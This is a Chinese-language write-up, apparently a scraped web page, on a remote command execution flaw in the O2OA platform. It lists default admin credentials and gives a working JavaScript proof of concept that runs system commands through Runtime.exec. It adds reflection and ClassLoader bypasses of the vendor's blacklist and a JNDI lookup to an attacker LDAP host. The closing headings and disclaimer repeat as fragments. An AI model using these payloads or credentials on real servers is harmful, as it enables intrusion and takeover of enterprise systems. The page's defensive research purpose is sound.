O2OA GetShell漏洞分析与绕过技术研究<\/h1>

1. 漏洞概述<\/h2>
O2OA是一款开源的企业应用开发平台，存在一个允许通过JavaScript代码执行实现远程命令执行的漏洞。该漏洞自2020年暴露以来，经历了多次修复与绕过。<\/p>

2. 环境搭建<\/h2>

2.1 搭建方法<\/h3>

源码方式<\/strong>：<\/p>

从GitHub官方仓库下载源码：https:\/\/github.com\/o2oa\/<\/li> <\/ul> <\/li>

Docker方式<\/strong>：<\/p>
docker pull o2oa\/o2oa <\/span><\/span>docker run -d --name o2oa -p 80:80 o2oa\/o2oa <\/span><\/span><\/code><\/pre><\/li> Windows版本<\/strong>：<\/p> 下载地址：http:\/\/mirror1.o2oa.net\/versionList.html<\/li> 运行启动脚本即可<\/li> <\/ul> <\/li> <\/ol> 2.2 默认凭证<\/h3> 用户名：xadmin<\/li> 密码：o2oa@2022<\/li> <\/ul> 3. 漏洞复现<\/h2> 3.1 基本利用步骤<\/h3> 登录后台（http:\/\/[ip]\/x_desktop\/index.html）<\/li> 进入"服务管理"页面<\/li> 输入恶意JavaScript代码<\/li> 关闭相关安全设置（非必需但简化利用）<\/li> 访问特定接口执行命令<\/li> <\/ol> 3.2 原始PoC<\/h3> var<\/span> result<\/span> =<\/span> java<\/span>.lang<\/span>.Runtime<\/span>.getRuntime<\/span>().exec<\/span>("whoami"<\/span>); <\/span><\/span>var<\/span> inputStreamReader<\/span> =<\/span> new<\/span> java<\/span>.io<\/span>.InputStreamReader<\/span>(result<\/span>.getInputStream<\/span>()); <\/span><\/span>var<\/span> bufferedReader<\/span> =<\/span> new<\/span> java<\/span>.io<\/span>.BufferedReader<\/span>(inputStreamReader<\/span>); <\/span><\/span>var<\/span> line<\/span> =<\/span> ""<\/span>; <\/span><\/span>var<\/span> output<\/span> =<\/span> ""<\/span>; <\/span><\/span>while<\/span>((line<\/span> =<\/span> bufferedReader<\/span>.readLine<\/span>()) !=<\/span> null<\/span>){ <\/span><\/span> output<\/span> +=<\/span> line<\/span> +<\/span> "\n"<\/span>; <\/span><\/span>} <\/span><\/span>output<\/span>; <\/span><\/span><\/code><\/pre>请求方式需改为POST，JSON格式提交。<\/p> 4. 漏洞修复与绕过<\/h2> 4.1 官方修复方案<\/h3> 官方通过黑名单机制进行防护，黑名单位于： \/configSample\/general.json<\/code><\/p> 被阻止的Java类包括：<\/p> java.lang.ProcessBuilder<\/code><\/li> java.lang.Runtime<\/code><\/li> javax.script.ScriptEngineManager<\/code><\/li> java.lang.ProcessImpl<\/code><\/li> java.lang.ProcessEnvironment<\/code><\/li> <\/ul> 4.2 反射绕过技术<\/h3> 使用Java反射机制绕过黑名单：<\/p> var<\/span> clazz<\/span> =<\/span> java<\/span>.lang<\/span>.Class<\/span>.forName<\/span>("java.lang.Runtime"<\/span>); <\/span><\/span>var<\/span> method<\/span> =<\/span> clazz<\/span>.getMethod<\/span>("getRuntime"<\/span>); <\/span><\/span>var<\/span> runtime<\/span> =<\/span> method<\/span>.invoke<\/span>(null<\/span>); <\/span><\/span>var<\/span> execMethod<\/span> =<\/span> clazz<\/span>.getMethod<\/span>("exec"<\/span>, java<\/span>.lang<\/span>.String); <\/span><\/span>var<\/span> result<\/span> =<\/span> execMethod<\/span>.invoke<\/span>(runtime<\/span>, "whoami"<\/span>); <\/span><\/span> <\/span><\/span>var<\/span> inputStreamReader<\/span> =<\/span> new<\/span> java<\/span>.io<\/span>.InputStreamReader<\/span>(result<\/span>.getInputStream<\/span>()); <\/span><\/span>var<\/span> bufferedReader<\/span> =<\/span> new<\/span> java<\/span>.io<\/span>.BufferedReader<\/span>(inputStreamReader<\/span>); <\/span><\/span>var<\/span> line<\/span> =<\/span> ""<\/span>; <\/span><\/span>var<\/span> output<\/span> =<\/span> ""<\/span>; <\/span><\/span>while<\/span>((line<\/span> =<\/span> bufferedReader<\/span>.readLine<\/span>()) !=<\/span> null<\/span>){ <\/span><\/span> output<\/span> +=<\/span> line<\/span> +<\/span> "\n"<\/span>; <\/span><\/span>} <\/span><\/span>output<\/span>; <\/span><\/span><\/code><\/pre>4.3 ClassLoader绕过<\/h3> 当Class.forName<\/code>被禁止时，可使用ClassLoader：<\/p> var<\/span> clazz<\/span> =<\/span> java<\/span>.lang<\/span>.Thread<\/span>.currentThread<\/span>().getContextClassLoader<\/span>().loadClass<\/span>("java.lang.Runtime"<\/span>); <\/span><\/span>var<\/span> method<\/span> =<\/span> clazz<\/span>.getMethod<\/span>("getRuntime"<\/span>); <\/span><\/span>var<\/span> runtime<\/span> =<\/span> method<\/span>.invoke<\/span>(null<\/span>); <\/span><\/span>var<\/span> execMethod<\/span> =<\/span> clazz<\/span>.getMethod<\/span>("exec"<\/span>, java<\/span>.lang<\/span>.String); <\/span><\/span>var<\/span> result<\/span> =<\/span> execMethod<\/span>.invoke<\/span>(runtime<\/span>, "whoami"<\/span>); <\/span><\/span> <\/span><\/span>var<\/span> inputStreamReader<\/span> =<\/span> new<\/span> java<\/span>.io<\/span>.InputStreamReader<\/span>(result<\/span>.getInputStream<\/span>()); <\/span><\/span>var<\/span> bufferedReader<\/span> =<\/span> new<\/span> java<\/span>.io<\/span>.BufferedReader<\/span>(inputStreamReader<\/span>); <\/span><\/span>var<\/span> line<\/span> =<\/span> ""<\/span>; <\/span><\/span>var<\/span> output<\/span> =<\/span> ""<\/span>; <\/span><\/span>while<\/span>((line<\/span> =<\/span> bufferedReader<\/span>.readLine<\/span>()) !=<\/span> null<\/span>){ <\/span><\/span> output<\/span> +=<\/span> line<\/span> +<\/span> "\n"<\/span>; <\/span><\/span>} <\/span><\/span>output<\/span>; <\/span><\/span><\/code><\/pre>4.4 JNDI注入<\/h3> 对于高版本JDK，可使用JNDI注入（需配合低版本JDK）：<\/p> var<\/span> ctx<\/span> =<\/span> new<\/span> javax<\/span>.naming<\/span>.InitialContext<\/span>(); <\/span><\/span>ctx<\/span>.lookup<\/span>("ldap:\/\/attacker.com\/Exploit"<\/span>); <\/span><\/span><\/code><\/pre>5. 防御建议<\/h2> 及时更新到最新版本<\/li> 修改默认管理员密码<\/li> 限制后台访问IP<\/li> 监控general.json<\/code>文件的修改<\/li> 考虑使用应用防火墙(WAF)拦截可疑请求<\/li> <\/ol> 6. 参考资源<\/h2> O2OA官方GitHub：https:\/\/github.com\/o2oa\/o2oa<\/li> 相关Issue讨论： https:\/\/github.com\/o2oa\/o2oa\/issues\/158<\/li> https:\/\/github.com\/o2oa\/o2oa\/issues\/159<\/li> <\/ul> <\/li> JNDI利用参考：https:\/\/xz.aliyun.com\/t\/16872<\/li> <\/ol> 免责声明<\/h2> 本文仅用于安全研究与教育目的。未经授权对系统进行测试或攻击是违法行为。传播、利用本文信息造成的任何后果由使用者自行承担。<\/p>

O2OA GetShell漏洞分析与绕过技术研究<\/h1>

1. 漏洞概述<\/h2> O2OA是一款开源的企业应用开发平台，存在一个允许通过JavaScript代码执行实现远程命令执行的漏洞。该漏洞自2020年暴露以来，经历了多次修复与绕过。<\/p>

2. 环境搭建<\/h2>

3. 漏洞复现<\/h2>

4. 漏洞修复与绕过<\/h2>

免责声明<\/h2> 本文仅用于安全研究与教育目的。未经授权对系统进行测试或攻击是违法行为。传播、利用本文信息造成的任何后果由使用者自行承担。<\/p>

1. 漏洞概述<\/h2>
O2OA是一款开源的企业应用开发平台，存在一个允许通过JavaScript代码执行实现远程命令执行的漏洞。该漏洞自2020年暴露以来，经历了多次修复与绕过。<\/p>

免责声明<\/h2>
本文仅用于安全研究与教育目的。未经授权对系统进行测试或攻击是违法行为。传播、利用本文信息造成的任何后果由使用者自行承担。<\/p>